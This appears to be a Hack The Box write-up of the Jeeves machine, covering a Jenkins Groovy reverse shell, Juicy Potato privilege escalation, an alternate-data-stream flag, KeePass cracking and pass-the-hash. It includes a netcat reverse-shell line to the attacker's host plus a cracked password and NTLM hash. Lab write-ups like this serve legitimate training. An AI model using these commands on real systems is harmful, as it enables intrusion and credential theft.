Hack The Box — Jeeves
Jeeves is a Medium rated Hack The Box machine and is rated as more challenging than oscp.Here we exploit Jenkins using a groovy reverse shell and privilege escalate using Juicy Potato.
Nmap scan shows us that port 80,135,445 and 50000 are open
Port 80 hosts a webpage with ask jeeves, we look at the source code and even directory bruteforce but find nothing useful
However when we use dirsearch on port 50000 we find a hidden directory called /askjeeves .DO NOTE that the wordlist we have to use is directory-list 1.0 and it will take quite some time as well. Using any other wordlist will take forever.
The directory brings us over to this jenkins webpage.In jenkins if we go to >Manage Jenkins ,there is a place called >Script Console where we need to run a groovy script to get a reverse shell.I had previously worked with jenkins in a previous ctf and when it comes to this box,the exploitation method is same as well so you can refer my writeup-https://sparshjazz.medium.com/tryhackme-alfred-1b21aef8bef3
Go to > MANAGE JENKINS > SCRIPT CONSOLE
You can easily google- groovy script reverse shell and get it in this github repo of payload all the things
We run the groovy script reverse shell and catch it on our netcat listener!
We run quick commands like whoami, whoami /priv to see what privileges we have and systeminfo to find more information about our target machine
As we can see, the hostname is jeeves, the architecture is x64, the target is Windows 10 pro.We can also see the build is 10586 and we have SeImpersonatePrivilege and SeChangeNotifyPrivilege are ENABLED. And thus we know that we can run Juicy Potato exploit.
About Juicy Potato- We use Juicy Potato exploit if the windows build is less than Windows 10 1809 OR less than Windows Server 2019 and the target has SeImpersonatePrivilege or SeAssignPrimaryToken Enabled. Now since the build of our target is less than 1809 and the privileges are enabled as well, we can use it !!! You can refer to this writeup for a detail usage-https://medium.com/r3d-buck3t/impersonating-privileges-with-juicy-potato-e5896b20d505 (HIGHLY RECOMMENDED)
First we have to transfer the juicy potato exploit to our target machine also with other necessary files.To transfer files, we will use SMB Server which we will host from our kali machine. (make sure that the files you wanna upload to the target are in the /home/kali directory in case you are following my commands) If you are not familiar with this, do some research and it will be clear.Our target does not support wget or certutil for file transfer and trust me SMB server is best for transferring files!!!
In our target windows machine, we make a temp directory within the C:\ folder. and run the command to copy the file hosted by the smb server of our kali machine.The ip will be of our kali machine. and we will be saving it in the C:\temp directory of windows.
NOTE: For any further file transfer to the target machine, i’ll use the same method.The usage is — copy \\kali-ip\filename C:\tmp\filename
(make sure that the file u wanna transfer from your kali machine is in the /home/kali directory) Anyways moving on…
We have transferred JuicyPotato.exe to the target and GetCLSID.ps1 which is a powershell script.This script helps us to find valid CLSID for the juicy potato attack.(download link-https://github.com/ohpe/juicy-potato/blob/master/CLSID/GetCLSID.ps1)
Once GetCLSID.ps1 is download and you have transferred it to the target,we need to run this powershell command
After running this, automatically a directory called Windows_10_Pro will be created and within it there will be a file called CLSID.list which we can read.
Now we need to transfer a reverse shell payload.You can use an exe file or .bat or powershell revershell. However here when i tried to use a exe reverse shell which i made using msfvenom, it didn’t work.Lets use a .bat reverseshell instead.
To do so, first run the command in your kali to locate netcat executable
command — locate nc.exe
Next, copy the nc.exe from your kali to windows as shown below
Now in your windows, make a file called priv.bat which has the following code(This is basically a one liner netcat reverse shell which executes the nc.exe binary which we have transferred)
C:\temp\nc.exe -e cmd.exe kali-ip 9999
Finally it’s time to run the Juicy Potato exploit.Here -l which is set to port 9999 is our listening port. We have to start a netcat listener on port 9999 before running this exploit. The priv.bat is our revershell and -c is our CLSID
Run it and we will get a shell as SYSTEM
This was the most annoying part of the machine.As Per HackTheBox’s rules, the root flag should always be in a text file in the administrator’s Desktop folder. However if you go to > Administrator>Desktop, you will find a file called hm.txt which tells you to go deeper. After this i spent 30 mins looking for txt or xml or ini files or any useful files using the command:
findstr /si password *.txt *.xml *.ini
However i was unable to find it.After reading a writeup i found out that this was very new to others as well, i got to know that it was something related to Alternate Data Stream and you need to run a command to actually see it
dir /r /a:
Alternate Data Streams (ADS) is an element of NTFS files to hide information.You can show alternate data streams in a directory listing with the /r switch: (FOR MORE INFORMATION, USE GOOGLE)
Some Windows utilities recognize ADS and some don’t. For example, type, the go-to utility for reading text from a file, does not, so I used the more command, which seemed okay with the following:
To get the root flag, we have to run
more < hm.txt:root.txt
[BONUS] — Cracking .kdbx file (keypass) & USING pth-winexe for Pass The Hash Attack
At C:\Users\kohsuke\Documents, I found an interesting file:
Googling the kdbx extension, I discovered that it represents an encrypted data store for a password manager program named KeePass. Figuring that the passwords inside could further my compromise of the box, I downloaded the file and researched the file type more deeply. I learned that the keepass2john utility could extract a password hash from this file that would then be loadable by the hash cracking utility John The Ripper. The process of using keepass2john and John itself to obtain the master password for the KeePass file is shown below.
As indicated by the image, the password for the KeePass file was “moonshine1”. To open the CEH.kdbx data store with this password, I downloaded the portable version of KeePass, executed it, and simply used the >FILE → Open File menu option to load CEH.kdbx. When prompted, I provided the password that John found, which proved sufficient to decrypt the data store and show me many things I wasn’t supposed to see:
NOTE: In order to mannually open the KeePass database file using commandline, we can use kpcli.Refer to this writeup by Rana Khalil-https://rana-khalil.gitbook.io/hack-the-box-oscp-preparation/more-challenging-than-oscp/jeeves-writeup-w-o-metasploit
I examined each password individually and discovered that the “Backup stuff” password was an NTLM hash aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00. I thought that I could use this in a pass-the-hash attack against the JEEVES machine’s Administrator account to gain elevated privileges. There are numerous tools that could aid us in doing this. I chose to use the simple pth-winexe program, as shown below.
This was a really interesting box other than the part of finding the root flag which was pretty annoying and ctf like.In this box, we learned that
- Always directory bruteforce on all web related ports
- We can get a reverse shell from Jenkins using Groovy Script
- We use Juicy Potato exploit if the windows build is less than Windows 10 1809 OR less than Windows Server 2019 and the target has SeImpersonatePrivilege or SeAssignPrimaryToken Enabled.
- In case Juicy Potato exploit doesn’t work, we can try using a .bat reverse shell for the (-p) option or even use a powershell reverse shell.In case CLSID doesn’t work, we can find valid ones using a script like GetCLSID.ps1
- If we have a kdbx file(keypass) we can crack it using Keepass2john
- if we find NTLM hash of the windows target, we can use pth-winexe and perform pass the hash attack to get an admin shell.